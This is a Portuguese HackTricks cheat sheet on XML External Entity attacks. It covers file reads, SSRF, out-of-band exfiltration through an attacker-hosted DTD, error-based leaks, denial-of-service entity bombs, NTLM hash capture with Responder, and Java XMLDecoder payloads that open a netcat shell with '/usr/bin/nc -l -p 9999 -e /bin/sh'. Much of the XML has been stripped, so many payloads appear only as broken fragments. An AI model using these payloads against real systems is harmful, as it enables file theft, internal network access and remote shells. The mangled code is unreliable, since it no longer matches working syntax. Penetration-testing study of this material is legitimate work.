# XXE - XEE - Entidade Externa XML
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family) * **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Um ataque de Entidade Externa XML é um tipo de ataque contra uma aplicação que analisa entrada XML. ## Fundamentos do XML **A maior parte desta seção foi retirada desta incrível página da Portswigger:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities) ### O que é XML? XML significa "linguagem de marcação extensível". XML é uma linguagem projetada para armazenar e transportar dados. Como o HTML, o XML usa uma estrutura em árvore de tags e dados. Ao contrário do HTML, o XML não usa tags predefinidas, então as tags podem receber nomes que descrevem os dados. No início da história da web, o XML estava em voga como formato de transporte de dados (o "X" em "AJAX" significa "XML"). Mas sua popularidade agora diminuiu em favor do formato JSON. ### O que são entidades XML? Entidades XML são uma forma de representar um item de dados dentro de um documento XML, em vez de usar os próprios dados. Várias entidades estão incorporadas na especificação da linguagem XML. Por exemplo, as entidades `<` e `>` representam os caracteres `<` e `>`. Esses são metacaracteres usados para denotar tags XML, e por isso geralmente devem ser representados usando suas entidades quando aparecem dentro dos dados. ### O que são elementos XML? Declarações de tipo de elemento definem as regras para o tipo e número de elementos que podem aparecer em um documento XML, quais elementos podem aparecer um dentro do outro e em que ordem devem aparecer. Por exemplo: * `` Significa que qualquer objeto pode estar dentro do pai `` * \ Significa que deve estar vazio `` * \ Declara que `` pode ter os filhos `` e `` ### O que é definição de tipo de documento? A definição de tipo de documento XML (DTD) contém declarações que podem definir a estrutura de um documento XML, os tipos de valores de dados que ele pode conter e outros itens. A DTD é declarada dentro do elemento opcional `DOCTYPE` no início do documento XML. A DTD pode ser totalmente autocontida dentro do próprio documento (conhecida como "DTD interna") ou pode ser carregada de outro lugar (conhecida como "DTD externa") ou pode ser uma mistura dos dois. ### O que são entidades XML personalizadas? O XML permite que entidades personalizadas sejam definidas dentro da DTD. Por exemplo: ` ]>` Esta definição significa que qualquer uso da referência de entidade `&myentity;` dentro do documento XML será substituído pelo valor definido: "`meu valor de entidade`". ### O que são entidades externas XML? Entidades externas XML são um tipo de entidade personalizada cuja definição está localizada fora da DTD onde são declaradas. A declaração de uma entidade externa usa a palavra-chave `SYSTEM` e deve especificar uma URL de onde o valor da entidade deve ser carregado. Por exemplo: ` ]>` A URL pode usar o protocolo `file://`, e assim entidades externas podem ser carregadas a partir de arquivos. Por exemplo: ` ]>` Entidades externas XML fornecem o principal meio pelo qual [ataques de entidade externa XML](https://portswigger.net/web-security/xxe) surgem. ### O que são entidades de parâmetro XML? Às vezes, ataques XXE usando entidades regulares são bloqueados, devido a alguma validação de entrada pela aplicação ou algum reforço do analisador XML que está sendo usado. Nessa situação, você pode ser capaz de usar entidades de parâmetro XML em vez disso. Entidades de parâmetro XML são um tipo especial de entidade XML que só pode ser referenciada em outro lugar dentro da DTD. Para os propósitos atuais, você só precisa saber duas coisas. Primeiro, a declaração de uma entidade de parâmetro XML inclui o caractere de porcentagem antes do nome da entidade: `` E segundo, entidades de parâmetro são referenciadas usando o caractere de porcentagem em vez do habitual e comercial: `%myparameterentity;` Isso significa que você pode testar para XXE cego usando detecção fora de banda via entidades de parâmetro XML da seguinte forma: ` %xxe; ]>` Esta carga útil XXE declara uma entidade de parâmetro XML chamada `xxe` e então usa a entidade dentro da DTD. Isso causará uma pesquisa DNS e uma solicitação HTTP para o domínio do atacante, verificando que o ataque foi bem-sucedido. ## Principais ataques [A maioria desses ataques foi testada usando os incríveis laboratórios XEE da Portswiggers: https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) ### Teste de Nova Entidade Neste ataque, vou testar se uma simples nova declaração de ENTIDADE está funcionando ```markup ]> &toreplace; 1 ``` ![](<../.gitbook/assets/image (220).png>) ### Ler arquivo Vamos tentar ler `/etc/passwd` de diferentes maneiras. Para Windows, você poderia tentar ler: `C:\windows\system32\drivers\etc\hosts` Neste primeiro caso, observe que SYSTEM "_**file:///**etc/passwd_" também funcionará. ```markup ]> &example; ``` ```markdown Este segundo caso deve ser útil para extrair um arquivo se o servidor web estiver usando PHP (Não é o caso dos laboratórios da Portswigger) ``` ```markup ]> &example; ``` Neste terceiro caso, observe que estamos declarando o `Element stockCheck` como ANY ```markup ]> &file; 1 ``` ![](<../.gitbook/assets/image (222) (1).png>) ### Listagem de diretórios Em aplicações baseadas em **Java**, pode ser possível **listar o conteúdo de um diretório** via XXE com um payload como (solicitando o diretório em vez do arquivo): ```markup ]>&xxe; ]>&xxe; ``` ### SSRF Um XXE pode ser usado para abusar de um SSRF dentro de uma nuvem ```markup ]> &xxe;1 ``` ### Blind SSRF Usando a **técnica comentada anteriormente**, você pode fazer com que o servidor acesse um servidor que você controla para mostrar que está vulnerável. Mas, se isso não estiver funcionando, talvez seja porque **entidades XML não são permitidas**, nesse caso você poderia tentar usar **entidades de parâmetro XML**: ```markup %xxe; ]> 3;1 ``` ### "Blind" SSRF - Exfiltrar dados out-of-band **Nesta ocasião, vamos fazer o servidor carregar um novo DTD com um payload malicioso que enviará o conteúdo de um arquivo via requisição HTTP (para arquivos de múltiplas linhas, você poderia tentar exfiltrá-lo via** _**ftp://**_**). Esta explicação foi retirada do** [**laboratório da Portswigger aqui**](https://portswigger.net/web-security/xxe/blind)**.** Um exemplo de um DTD malicioso para exfiltrar o conteúdo do arquivo `/etc/hostname` é o seguinte: ```markup "> %eval; %exfiltrate; ``` Este DTD executa os seguintes passos: * Define uma entidade de parâmetro XML chamada `file`, contendo o conteúdo do arquivo `/etc/passwd`. * Define uma entidade de parâmetro XML chamada `eval`, contendo uma declaração dinâmica de outra entidade de parâmetro XML chamada `exfiltrate`. A entidade `exfiltrate` será avaliada ao fazer uma solicitação HTTP para o servidor web do atacante contendo o valor da entidade `file` dentro da string de consulta da URL. * Utiliza a entidade `eval`, o que causa a declaração dinâmica da entidade `exfiltrate` a ser realizada. * Utiliza a entidade `exfiltrate`, para que seu valor seja avaliado ao solicitar a URL especificada. O atacante deve então hospedar o DTD malicioso em um sistema que eles controlam, normalmente carregando-o em seu próprio servidor web. Por exemplo, o atacante pode servir o DTD malicioso na seguinte URL:\ `http://web-attacker.com/malicious.dtd` Finalmente, o atacante deve enviar a seguinte carga útil XXE para a aplicação vulnerável: ```markup %xxe;]> 3;1 ``` Este payload XXE declara uma entidade de parâmetro XML chamada `xxe` e depois usa a entidade dentro do DTD. Isso fará com que o analisador XML busque o DTD externo do servidor do atacante e o interprete inline. As etapas definidas dentro do DTD malicioso são então executadas, e o arquivo `/etc/passwd` é transmitido para o servidor do atacante. ### Baseado em Erro (DTD Externo) **Neste caso, vamos fazer o servidor carregar um DTD malicioso que mostrará o conteúdo de um arquivo dentro de uma mensagem de erro (isso só é válido se você puder ver mensagens de erro).** [**Exemplo daqui.**](https://portswigger.net/web-security/xxe/blind) Você pode desencadear uma mensagem de erro de análise XML contendo o conteúdo do arquivo `/etc/passwd` usando um DTD externo malicioso da seguinte forma: ```markup "> %eval; %error; ``` Este DTD executa os seguintes passos: * Define uma entidade de parâmetro XML chamada `file`, contendo o conteúdo do arquivo `/etc/passwd`. * Define uma entidade de parâmetro XML chamada `eval`, contendo uma declaração dinâmica de outra entidade de parâmetro XML chamada `error`. A entidade `error` será avaliada ao carregar um arquivo inexistente cujo nome contém o valor da entidade `file`. * Utiliza a entidade `eval`, o que causa a declaração dinâmica da entidade `error` a ser realizada. * Utiliza a entidade `error`, de modo que seu valor seja avaliado ao tentar carregar o arquivo inexistente, resultando em uma mensagem de erro contendo o nome do arquivo inexistente, que é o conteúdo do arquivo `/etc/passwd`. Invoque o erro de DTD externo com: ```markup %xxe;]> 3;1 ``` E você deve ver o conteúdo do arquivo dentro da mensagem de erro da resposta do servidor web. ![](<../.gitbook/assets/image (223) (1).png>) _**Por favor, note que o DTD externo nos permite incluir uma entidade dentro da segunda (****`eval`****), mas isso é proibido no DTD interno. Portanto, você não pode forçar um erro sem usar um DTD externo (geralmente).**_ ### **Baseado em Erro (DTD do sistema)** Então, o que dizer das vulnerabilidades XXE cegas quando **interações fora de banda estão bloqueadas** (conexões externas não estão disponíveis)? [Informações daqui](https://portswigger.net/web-security/xxe/blind). Nessa situação, ainda pode ser possível **desencadear mensagens de erro contendo dados sensíveis**, devido a uma brecha na especificação da linguagem XML. Se o **DTD de um documento usa uma combinação de declarações de DTD internas e externas**, então o **DTD interno pode redefinir entidades que são declaradas no DTD externo**. Quando isso acontece, a restrição de usar uma entidade de parâmetro XML dentro da definição de outra entidade de parâmetro é relaxada. Isso significa que um atacante pode empregar a técnica XXE baseada em erro **a partir de um DTD interno**, desde que a entidade de parâmetro XML que eles usam esteja **redefinindo uma entidade que é declarada dentro de um DTD externo**. Claro, se as conexões fora de banda estão bloqueadas, então o DTD externo não pode ser carregado de um local remoto. Em vez disso, precisa ser um **arquivo DTD externo que esteja local no servidor da aplicação**. _Essencialmente, o ataque envolve invocar um arquivo DTD que por acaso existe no sistema de arquivos local e reutilizá-lo para redefinir uma entidade existente de uma maneira que desencadeie um erro de análise contendo dados sensíveis._ Por exemplo, suponha que haja um arquivo DTD no sistema de arquivos do servidor no local `/usr/local/app/schema.dtd`, e este arquivo DTD define uma entidade chamada `custom_entity`. Um atacante pode desencadear uma mensagem de erro de análise XML contendo o conteúdo do arquivo `/etc/passwd` ao enviar um DTD híbrido como o seguinte: ```markup "> %eval; %error; '> %local_dtd; ]> ``` Este DTD executa os seguintes passos: * Define uma entidade de parâmetro XML chamada `local_dtd`, contendo o conteúdo do arquivo DTD externo que existe no sistema de arquivos do servidor. * Redefine a entidade de parâmetro XML chamada `custom_entity`, que já está definida no arquivo DTD externo. A entidade é redefinida como contendo o [exploit XXE baseado em erro](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages) que já foi descrito, para acionar uma mensagem de erro contendo o conteúdo do arquivo `/etc/passwd`. * Utiliza a entidade `local_dtd`, para que o DTD externo seja interpretado, incluindo o valor redefinido da entidade `custom_entity`. Isso resulta na mensagem de erro desejada. **Exemplo do mundo real:** Sistemas que usam o ambiente de desktop GNOME frequentemente têm um DTD em `/usr/share/yelp/dtd/docbookx.dtd` contendo uma entidade chamada `ISOamso`. ```markup "> %eval; %error; '> %local_dtd; ]> 3;1 ``` ![](<../.gitbook/assets/image (224).png>) Como essa técnica utiliza um **DTD interno, você precisa encontrar um válido primeiro**. Você pode fazer isso **instalando** o mesmo **OS / Software** que o servidor está usando e **procurando alguns DTDs padrão**, ou **obtendo uma lista** de **DTDs padrão** dentro dos sistemas e **verificando** se algum deles existe: ```markup %local_dtd; ]> ``` ### Encontrando DTDs dentro do sistema No seguinte repositório incrível do github, você pode encontrar **caminhos de DTDs que podem estar presentes no sistema**: {% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %} Além disso, se você tiver a **imagem Docker do sistema da vítima**, você pode usar a ferramenta do mesmo repositório para **escanear** a **imagem** e **encontrar** o caminho dos **DTDs** presentes dentro do sistema. Leia o [Readme do github](https://github.com/GoSecure/dtd-finder) para aprender como. ```bash java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar Scanning TAR file /tmp/dadocker.tar [=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd Testing 0 entities : [] [=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd Testing 0 entities : [] ``` ### XXE via Analisadores de Office Open XML Para uma explicação mais aprofundada deste ataque, **confira a segunda seção deste [post incrível](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) do Detectify**. A capacidade de **fazer upload de documentos do Microsoft Office é oferecida por muitas aplicações web**, que em seguida procedem para extrair certos detalhes desses documentos. Por exemplo, uma aplicação web pode permitir que usuários importem dados fazendo upload de uma planilha no formato XLSX. Para que o analisador extraia os dados da planilha, ele inevitavelmente precisará analisar pelo menos um arquivo XML. Para testar essa vulnerabilidade, é necessário criar um **arquivo do Microsoft Office contendo um payload XXE**. O primeiro passo é criar um diretório vazio onde o documento possa ser descompactado. Uma vez que o documento tenha sido descompactado, o arquivo XML localizado em `./unzipped/word/document.xml` deve ser aberto e editado em um editor de texto de preferência (como o vim). O XML deve ser modificado para incluir o payload XXE desejado, geralmente começando com uma requisição HTTP. As linhas XML modificadas devem ser inseridas entre os dois objetos raiz XML. É importante substituir a URL por uma URL monitorável para as requisições. Finalmente, o arquivo pode ser compactado para criar o arquivo malicioso poc.docx. A partir do diretório "unzipped" criado anteriormente, o seguinte comando deve ser executado: Agora, o arquivo criado pode ser carregado para a aplicação web potencialmente vulnerável, e pode-se esperar que uma requisição apareça nos logs do Burp Collaborator. ### Protocolo Jar: O protocolo `jar` está disponível apenas em **aplicações Java**. Ele permite acessar arquivos dentro de um arquivo **PKZIP** (`.zip`, `.jar`, ...), e funciona para arquivos locais e remotos: ``` jar:file:///var/myarchive.zip!/file.txt jar:https://download.host.com/myarchive.zip!/file.txt ``` {% hint style="danger" %} Ser capaz de acessar arquivos dentro de arquivos PKZIP é **extremamente útil para abusar de XXE via arquivos DTD do sistema.** Verifique [esta seção para aprender como abusar de arquivos DTD do sistema](xxe-xee-xml-external-entity.md#error-based-system-dtd). {% endhint %} #### Por trás das cenas 1. Faz uma requisição HTTP para carregar o arquivo zip. `https://download.host.com/myarchive.zip` 2. Salva a resposta HTTP em um local temporário. `/tmp/...` 3. Extrai o arquivo do arquivo. 4. Lê o `file.zip` 5. Deleta arquivos temporários. Note que é possível interromper o fluxo no segundo passo. O truque é nunca fechar a conexão ao servir o arquivo. [Estas ferramentas podem ser úteis](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution): uma em python `slow_http_server.py` e uma em java `slowserver.jar`. Uma vez que o servidor tenha baixado seu arquivo, você precisa encontrar sua localização navegando pelo diretório temp. Sendo aleatório, o caminho do arquivo não pode ser previsto antecipadamente. ![Jar](https://gosecure.github.io/xxe-workshop/img/74fac3155d455980.png) {% hint style="danger" %} Escrever arquivos em um diretório temporário pode ajudar a **escalar outra vulnerabilidade que envolve um caminho de travessia** (como inclusão de arquivo local, injeção de template, XSLT RCE, desserialização, etc). {% endhint %} ### XSS ```markup script]]>alert(1)/script]]> ``` ### DoS #### Ataque Billion Laugh ```markup ]> &a4; ``` #### Ataque Yaml ```markup a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` #### Ataque de Quadratic Blowup ![](<../.gitbook/assets/image (531).png>) #### Obtendo NTML Em hosts Windows é possível obter o hash NTML do usuário do servidor web configurando um manipulador responder.py: ``` Responder.py -I eth0 -v ``` e ao enviar a seguinte solicitação ``` ]> &example; ``` Então você pode tentar quebrar o hash usando hashcat ## Superfícies XXE Ocultas ### XInclude [Daqui.](https://portswigger.net/web-security/xxe) Algumas aplicações **recebem dados submetidos pelo cliente, incorporam-nos no lado do servidor em um documento XML e, em seguida, analisam o documento**. Um exemplo disso ocorre quando dados submetidos pelo cliente são colocados em uma **solicitação SOAP de backend**, que é processada pelo serviço SOAP de backend. Nessa situação, você não pode realizar um ataque XXE clássico, porque **não controla o documento XML inteiro** e, portanto, não pode definir ou modificar um elemento `DOCTYPE`. No entanto, você pode ser capaz de usar `XInclude` em vez disso. `XInclude` é uma parte da especificação XML que permite que um documento XML seja construído a partir de subdocumentos. Você pode colocar um ataque `XInclude` dentro de qualquer valor de dados em um documento XML, então o ataque pode ser realizado em situações onde você controla apenas um único item de dados que é colocado em um documento XML do lado do servidor. Para realizar um ataque `XInclude`, você precisa referenciar o namespace `XInclude` e fornecer o caminho para o arquivo que deseja incluir. Por exemplo: ```markup productId=&storeId=1 ``` ### SVG - Upload de Arquivo [Daqui.](https://portswigger.net/web-security/xxe) Algumas aplicações permitem que usuários façam upload de arquivos que são processados no lado do servidor. Alguns formatos de arquivo comuns usam XML ou contêm subcomponentes XML. Exemplos de formatos baseados em XML são formatos de documentos de escritório como DOCX e formatos de imagem como SVG. Por exemplo, uma aplicação pode permitir que usuários **façam upload de imagens**, e processem ou validem essas imagens no servidor após o upload. Mesmo que a aplicação espere receber um formato como PNG ou JPEG, a **biblioteca de processamento de imagens que está sendo usada pode suportar imagens SVG**. Como o formato SVG usa XML, um atacante pode enviar uma imagem SVG maliciosa e assim alcançar superfícies de ataque ocultas para vulnerabilidades XXE. ```markup ``` Você também pode tentar **executar comandos** usando o encapsulador "expect" do PHP: ```markup ``` **Observe que a primeira linha do arquivo lido ou do resultado da execução aparecerá DENTRO da imagem criada. Portanto, você precisa ser capaz de acessar a imagem SVG que foi criada.** ### **PDF - Upload de arquivo** Leia o seguinte post para **aprender a explorar um XXE fazendo upload de um arquivo PDF**: {% content-ref url="file-upload/pdf-upload-xxe-and-cors-bypass.md" %} [pdf-upload-xxe-and-cors-bypass.md](file-upload/pdf-upload-xxe-and-cors-bypass.md) {% endcontent-ref %} ### Content-Type: De x-www-urlencoded para XML Se uma requisição POST aceita dados no formato XML, você poderia tentar explorar um XXE nessa requisição. Por exemplo, se uma requisição normal contém o seguinte: ```markup POST /action HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 7 foo=bar ``` Então, você pode ser capaz de enviar a seguinte solicitação, com o mesmo resultado: ```markup POST /action HTTP/1.0 Content-Type: text/xml Content-Length: 52 bar ``` ### Content-Type: De JSON para XEE Para alterar a solicitação, você pode usar uma extensão do Burp chamada “**Content Type Converter**“. [Aqui](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) você pode encontrar este exemplo: ```markup Content-Type: application/json;charset=UTF-8 {"root": {"root": { "firstName": "Avinash", "lastName": "", "country": "United States", "city": "ddd", "postalCode": "ddd" }}} ``` ```markup Content-Type: application/xml;charset=UTF-8 ]> &xxe; United States ddd ddd ``` Outro exemplo pode ser encontrado [aqui](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2). ## WAF & Proteções Bypasses ### Base64 ```markup %init; ]> ``` ### UTF-7 Você pode usar a \[**"Encode Recipe"** do cyberchef aqui]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) para transformar em UTF-7. ```markup +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4- ``` ```markup +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` ### Bypass do Protocolo file:/ Se a web estiver usando PHP, em vez de usar `file:/`, você pode usar **php wrappers** `php://filter/convert.base64-encode/resource=` para **acessar arquivos internos**. Se a web estiver usando Java, você pode verificar o [**protocolo jar:**](xxe-xee-xml-external-entity.md#jar-protocol). ### Entidades HTML Truque de [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\ Você pode criar uma **entidade dentro de outra entidade** codificando-a com **entidades HTML** e depois chamá-la para **carregar um dtd**.\ Note que as **Entidades HTML** usadas precisam ser **numéricas** (como \[neste exemplo]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)). ```markup %a;%dtd;]> &exfil; ``` Exemplo de DTD: ```markup "> %abt; %exfil; ``` ## PHP Wrappers ### Base64 **Extrair** _**index.php**_ ```markup ]> ``` #### **Extrair recurso externo** ```markup ]> ``` ### Execução remota de código **Se o módulo "expect" do PHP estiver carregado** ```markup ]> &xxe; mypass ``` ## **SOAP - XEE** ```markup %dtd;]>]]> ``` ## XLIFF - XXE Esta seção foi retirada de [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)\ De acordo com a [Wikipedia](https://en.wikipedia.org/wiki/XLIFF): > XLIFF (XML Localization Interchange File Format) é um formato de bitexto baseado em XML criado para padronizar a maneira como os dados localizáveis são passados entre ferramentas e durante um processo de localização e um formato comum para troca de ferramentas CAT. ### Solicitação cega ```markup ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml %remote; ]> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` A resposta do servidor com um erro: ```javascript {"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."} ``` Mas tivemos um resultado no Burp Collaborator. ### Exfiltração de Dados via Out of Band ```markup ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml %remote; ]> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` ### Exfiltração de Dados via Erro Baseado Arquivo DTD: ```markup "> %foo; %xxe; ``` Resposta do Servidor: ```javascript {"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"} ``` Ótimo! O arquivo `non-exist` é refletido nas mensagens de erro. O próximo passo é adicionar o Conteúdo do Arquivo. Arquivo DTD: ```markup "> %foo; %xxe; ``` E o conteúdo do arquivo foi **impresso com sucesso na saída do erro enviado via HTTP**. ## RSS - XEE XML válido no formato RSS para explorar uma vulnerabilidade XXE. ### Ping back Simples requisição HTTP para o servidor do atacante ```markup /rssXXE" >]> XXE Test Blog http://example.com/ XXE Test Blog Mon, 02 Feb 2015 00:00:00 -0000 &xxe; http://example.com Test Post author@example.com Mon, 02 Feb 2015 00:00:00 -0000 ``` ### Ler arquivo ```markup ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ### Ler código-fonte Usando filtro base64 do PHP ```markup ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ## XMLDecoder Java XEE para RCE XMLDecoder é uma classe Java que cria objetos com base em uma mensagem XML. Se um usuário mal-intencionado conseguir fazer com que uma aplicação use dados arbitrários em uma chamada ao método **readObject**, ele obterá instantaneamente execução de código no servidor. ### Usando Runtime().exec() ```markup /usr/bin/nc -l -p 9999 -e /bin/sh ``` ### ProcessBuilder ```markup /usr/bin/nc -l -p 9999 -e /bin/sh ``` ## Ferramentas {% embed url="https://github.com/luisfontes19/xxexploiter" %} ## Mais recursos [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\ [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\ Extrair informações via HTTP usando DTD externo próprio: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\ [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\ [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\ [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\ [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\ [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
Aprenda AWS hacking do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).